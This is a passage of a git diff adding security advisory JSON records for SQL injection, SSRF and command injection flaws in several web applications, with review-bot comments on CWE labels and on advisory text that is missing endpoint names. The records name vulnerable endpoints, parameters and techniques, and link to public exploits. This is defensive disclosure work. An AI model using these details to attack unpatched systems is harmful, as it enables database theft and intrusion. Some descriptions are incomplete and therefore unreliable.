+++ b/advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87vp-v5jj-xmcq", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25433" + ], + "details": "XOOPS CMS 2.5.9 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cid parameter. Attackers can send GET requests to the gerar_pdf.php endpoint with malicious cid values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25433" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46835" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xoops-cms-sql-injection-via-gerarpdfphp" + }, + { + "type": "WEB", + "url": "https://xoops.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json b/advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json new file mode 100644 index 0000000000000..0cb9daa02282b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8v8j-49p6-4ccp", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2019-25366" + ], + "details": "microASP Portal+ CMS contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the explode_tree parameter. Attackers can send crafted requests to pagina.phtml with SQL injection payloads using extractvalue and concat functions to extract sensitive database information like the current database name.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25366" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46799" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/microasp-portal-cms-sql-injection-via-paginaphtml" + }, + { + "type": "WEB", + "url": "http://www.microasp.it" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json b/advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json new file mode 100644 index 0000000000000..caba98dd40802 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-96mq-76jj-h8p9", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2954" + ], + "details": "A vulnerability was found in Dromara UJCMS 10.0.2. Impacted is the function importChanel of the file /api/backend/ext/import-data/import-channel of the component ImportDataController. Performing a manipulation of the argument driverClassName/url results in injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2954" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347320" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347320" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755222" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/la12138/pa2fpb/gsz2l14wlz8c4nsn?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json b/advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json new file mode 100644 index 0000000000000..523c8aa72a63d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-982r-pxpw-xv2x", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25461" + ], + "details": "Web Ofisi Platinum E-Ticaret v5 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'q' parameter. Attackers can send POST requests to the ajax/productsFilterSearch endpoint with malicious 'q' values using time-based blind SQL injection techniques to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25461" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47140" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-platinum-e-ticaret-sql-injection-via-ajaxproductsfiltersearch" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json b/advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json new file mode 100644 index 0000000000000..ceb95a71065f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fcj-8w2v-j38f", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2026-2945" + ], + "details": "A weakness has been identified in JeecgBoot 3.9.0. Affected by this vulnerability is an unknown functionality of the file /sys/common/uploadImgByHttp. Executing a manipulation of the argument fileUrl can lead to server-side request forgery. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2945" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347315" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347315" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754590" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/la12138/vxbwk9/glws4ppukxqtpfhl?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T13:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json b/advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json new file mode 100644 index 0000000000000..a3aa80bd40ec5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pg8-c68j-285r", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25442" + ], + "details": "Web Wiz Forums 12.01 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the PF parameter. Attackers can send GET requests to member_profile.asp with malicious PF values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25442" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47284" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-wiz-forums-sql-injection-via-pf-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json b/advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json new file mode 100644 index 0000000000000..075416ae90a88 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff6v-wx52-q8j8", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25452" + ], + "details": "Dolibarr ERP/CRM 10.0.1 contains an SQL injection vulnerability in the elemid POST parameter of the viewcat.php endpoint that allows unauthenticated attackers to execute arbitrary SQL queries. Attackers can submit crafted POST requests with malicious SQL payloads in the elemid parameter to extract sensitive database information using error-based or time-based blind SQL injection techniques.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25452" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47362" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dolibarr-erpcrm-sql-injection-via-elemid" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json b/advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json new file mode 100644 index 0000000000000..0a9c52d2e067a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fw7r-mghm-mcfw", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25440" + ], + "details": "WebIncorp ERP contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the prod_id parameter. Attackers can send GET requests to product_detail.php with malicious prod_id values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25440" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47199" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/webincorp-erp-every-version-sql-injection-via-productdetailphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json b/advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json new file mode 100644 index 0000000000000..c157d4c71d6c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwf8-cx3q-ch9g", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2952" + ], + "details": "A flaw has been found in Vaelsys 4.1.0. This vulnerability affects unknown code of the file /tree/tree_server.php of the component HTTP POST Request Handler. This manipulation of the argument xajaxargs causes os command injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2952" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunter-Leo/CVE/issues/10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347318" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347318" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755166" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json b/advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json new file mode 100644 index 0000000000000..1ff85b882f570 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json 
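Review bot: `cwe_ids` in GHSA-fwf8-cx3q-ch9g lists only `CWE-77`, while the `details` text describes OS command injection through `xajaxargs`, for which `CWE-78` is the more specific class. Consumers that triage or filter on CWE-78 would not pick this record up. If the upstream record supports it, the array could carry `"CWE-78"` as well. The `MODERATE` rating follows the supplied `C:L/I:L/A:L` vector, which looks low for an unauthenticated (`PR:N`) command injection and deserves a second look when the advisory is reviewed.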
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcj5-xf7h-rwx7", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25443" + ], + "details": "Inventory Webapp contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through GET parameters. Attackers can supply malicious SQL payloads in the name, description, quantity, or cat_id parameters to add-item.php to execute arbitrary database commands.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25443" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47356" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/inventory-webapp-sql-injection-via-add-itemphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json b/advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json new file mode 100644 index 0000000000000..48de793b1c44b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfw2-q9rx-mg64", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25460" + ], + "details": "Web Ofisi Platinum E-Ticaret v5 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'q' GET parameter. Attackers can send requests to the arama endpoint with malicious 'q' values using time-based SQL injection techniques to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25460" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47140" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-platinum-e-ticaret-sql-injection-via-q-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json b/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json new file mode 100644 index 0000000000000..b9887ba3cc03e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2p9-fpj7-9fjp", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25458" + ], + "details": "Web Ofisi Firma Rehberi v1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through GET parameters. Attackers can send requests to with malicious payloads in the 'il', 'kat', or 'kelime' parameters to extract sensitive database information or perform time-based blind SQL injection attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25458" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47143" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-firma-rehberi-sql-injection-via-firmalarhtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json b/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json new file mode 100644 index 0000000000000..a609137b0d4cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json 
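Review bot: The second sentence of `details` in GHSA-q2p9-fpj7-9fjp has lost the endpoint name: it reads `Attackers can send requests to with malicious payloads`, so the record no longer says which page takes the `il`, `kat` and `kelime` parameters. The same gap appears in GHSA-w7wm-w9qw-pc72 (`vulnerabilities in the endpoint that allow`) and GHSA-wf2x-4p8v-p7m6 (`send requests to with time-based`). The VulnCheck reference slug here ends in `via-firmalarhtml`, which presumably names the page, but the wording should be restored from the upstream CVE description rather than guessed. Defenders writing WAF or log-search rules from these records need the path.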
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx92-pw43-vf25", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25457" + ], + "details": "Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'oz' array parameter. Attackers can send GET requests to category pages with malicious 'oz[]' values using time-based blind SQL injection payloads to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25457" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47145" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-firma-sql-injection-via-oz-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json b/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json new file mode 100644 index 0000000000000..250d866e35528 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7wm-w9qw-pc72", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25459" + ], + "details": "Web Ofisi Emlak V2 contains multiple SQL injection vulnerabilities in the endpoint that allow unauthenticated attackers to manipulate database queries through GET parameters. Attackers can inject SQL code into parameters like emlak_durumu, emlak_tipi, il, ilce, kelime, and semt to extract sensitive database information or perform time-based blind SQL injection attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25459" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47142" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-emlak-sql-injection-via-emlak-arahtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/emlak-scripti-v3.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json b/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json new file mode 100644 